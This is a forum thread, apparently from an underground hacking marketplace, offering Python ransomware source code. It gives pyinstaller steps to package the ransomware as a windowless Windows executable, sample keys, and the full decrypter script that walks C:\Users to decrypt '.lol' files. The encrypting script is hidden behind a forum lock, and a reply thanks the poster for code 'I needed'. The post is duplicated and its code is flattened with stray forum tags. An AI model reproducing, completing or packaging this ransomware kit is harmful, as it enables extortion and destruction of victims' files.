Python Ransomware Source Code

PNK
Mars

Mars

Cyber Worker
🔥 Leet Worker
as safety deposit
$0.0

Python Ransomware

1703719718429
Complete Python RansomWare Source Code With Full Documentations
About: This is a Classic Example Of RansomWare Written in python.
Tested On: Windows 10 / Windows7
Suport : +Windows7
Date of Publish : 10/31/2019
Last Update : 12/25/2023
Went Find out about what is Ransomware


To Convet the .py to exe You can use pyinstaller.
To install pyinstaller: https://www.pyinstaller.org
To Convet .py File to exe : pyinstaller --onefile -w --icon YourIcon.ico Ransomware.py
Before Converting File to exe Run : pip install --user --requirement requirements.txt

To Decrypt Files :​


Run DeRansomware.py On line 29 From :
To Your Key (example):​
Key = b"\xbd\xb6\x80'4z\x9c\xb53{\xe3\xd7\xf4\xc2\\x08\xbd\xbb\xdb\xd6\xb2.\xfa\xe1o\x1f\xcd\x80AM\xd5>"
OR :​
Key = b'T\xb5\xc4\x14\xe4\xa7\x18\x0b8T\xdb\xec\xf0.v>t\xce\x91w5y1\xce\xa3\x1a;J<SKD'
Replace Key Betwen " " or ' ' with your own key​

DeRansomware.py - Decrypter:
#!/usr/bin/python3 try : import nacl, nacl.secret, pathlib, os # Our requirement except: print("Error try To run pip install requirement.txt") """Making class in order to decrypt""" class Decrypt(object): def __init__(self, Target,BoxM): self.Target = Target [HASH=171]#Our[/HASH] file Location self.BoxM = BoxM [HASH=172]#Box[/HASH] Moudle def FileE(loc): DeFileN = (loc.Target).strip(".lol") [HASH=173]#Remove[/HASH] .lol EnFileN = (loc.Target) # Our encrypted File name Date = 0 # Making null Date Var with open(EnFileN,"rb") as File: Date = File.read() # Read encrypted File and set all the date to the Date Var Decrypted = loc.BoxM.decrypt(Date) # Decrypte File with open(DeFileN,"wb") as File: File.write(Decrypted) # Save File to is the original state os.remove(EnFileN) # Removing Old file print(f"Decrypted -&gt; {DeFileN}") # You can remove if you went This line is for deBuging """Setting Up Some Global Vars""" Key = b'password' # Add your key hare box = nacl.secret.SecretBox(Key) # Our Safe box Moudle that we use to Decrypte Paths = [r"C:\Users\\"] # List of paths to Look for Files in """Our ForLoop So we walkthrough Our paths """ for AllFiles in Paths: # For all files in our list if (pathlib.Path(AllFiles).exists()): # Check if Path is a file, not a folder for path, subdirs, files in os.walk(AllFiles): if(("\\AppData\\") in path):pass # This is our blocklist you can add more else: for file in files : # For all of files in that folder if(".lol" in file): # Check if File have .lol formate FilePath = os.path.join(path, file) # Join Our path to our file nmae Decrypt(FilePath,box).FileE() # Call our Decrypt Moudle

Ransomware.py - Crypter + Ransomware:
 
Last edited by a moderator:

Python Ransomware

View attachment 141
Complete Python RansomWare Source Code With Full Documentations
About: This is a Classic Example Of RansomWare Written in python.
Tested On: Windows 10 / Windows7
Suport : +Windows7
Date of Publish : 10/31/2019
Last Update : 12/25/2023
Went Find out about what is Ransomware


To Convet the .py to exe You can use pyinstaller.
To install pyinstaller: https://www.pyinstaller.org
To Convet .py File to exe : pyinstaller --onefile -w --icon YourIcon.ico Ransomware.py
Before Converting File to exe Run : pip install --user --requirement requirements.txt

To Decrypt Files :​


Run DeRansomware.py On line 29 From :
To Your Key (example):​
Key = b"\xbd\xb6\x80'4z\x9c\xb53{\xe3\xd7\xf4\xc2\\x08\xbd\xbb\xdb\xd6\xb2.\xfa\xe1o\x1f\xcd\x80AM\xd5>"
OR :​
Key = b'T\xb5\xc4\x14\xe4\xa7\x18\x0b8T\xdb\xec\xf0.v>t\xce\x91w5y1\xce\xa3\x1a;J<SKD'
Replace Key Betwen " " or ' ' with your own key​

DeRansomware.py - Decrypter:
#!/usr/bin/python3 try : import nacl, nacl.secret, pathlib, os # Our requirement except: print("Error try To run pip install requirement.txt") """Making class in order to decrypt""" class Decrypt(object): def __init__(self, Target,BoxM): self.Target = Target [HASH=171]#Our[/HASH] file Location self.BoxM = BoxM [HASH=172]#Box[/HASH] Moudle def FileE(loc): DeFileN = (loc.Target).strip(".lol") [HASH=173]#Remove[/HASH] .lol EnFileN = (loc.Target) # Our encrypted File name Date = 0 # Making null Date Var with open(EnFileN,"rb") as File: Date = File.read() # Read encrypted File and set all the date to the Date Var Decrypted = loc.BoxM.decrypt(Date) # Decrypte File with open(DeFileN,"wb") as File: File.write(Decrypted) # Save File to is the original state os.remove(EnFileN) # Removing Old file print(f"Decrypted -&gt; {DeFileN}") # You can remove if you went This line is for deBuging """Setting Up Some Global Vars""" Key = b'password' # Add your key hare box = nacl.secret.SecretBox(Key) # Our Safe box Moudle that we use to Decrypte Paths = [r"C:\Users\\"] # List of paths to Look for Files in """Our ForLoop So we walkthrough Our paths """ for AllFiles in Paths: # For all files in our list if (pathlib.Path(AllFiles).exists()): # Check if Path is a file, not a folder for path, subdirs, files in os.walk(AllFiles): if(("\\AppData\\") in path):pass # This is our blocklist you can add more else: for file in files : # For all of files in that folder if(".lol" in file): # Check if File have .lol formate FilePath = os.path.join(path, file) # Join Our path to our file nmae Decrypt(FilePath,box).FileE() # Call our Decrypt Moudle

Ransomware.py - Crypter + Ransomware:
*** Hidden text: cannot be quoted. ***
Thank you for this code I needed it
 
Legal warning We do not host or store any files on our website except thread messages, most likely your DMCA content is being hosted on a third-party website and you need to contact them. Representatives of this site ("service") are not responsible for any content created by users and for accounts. The materials presented express only the opinions of their authors.
🚨 Do not get Ripped Off ! ⚖️ Deal with approved sellers or use Leet Escrow on Telegram @leetlat
Back
Top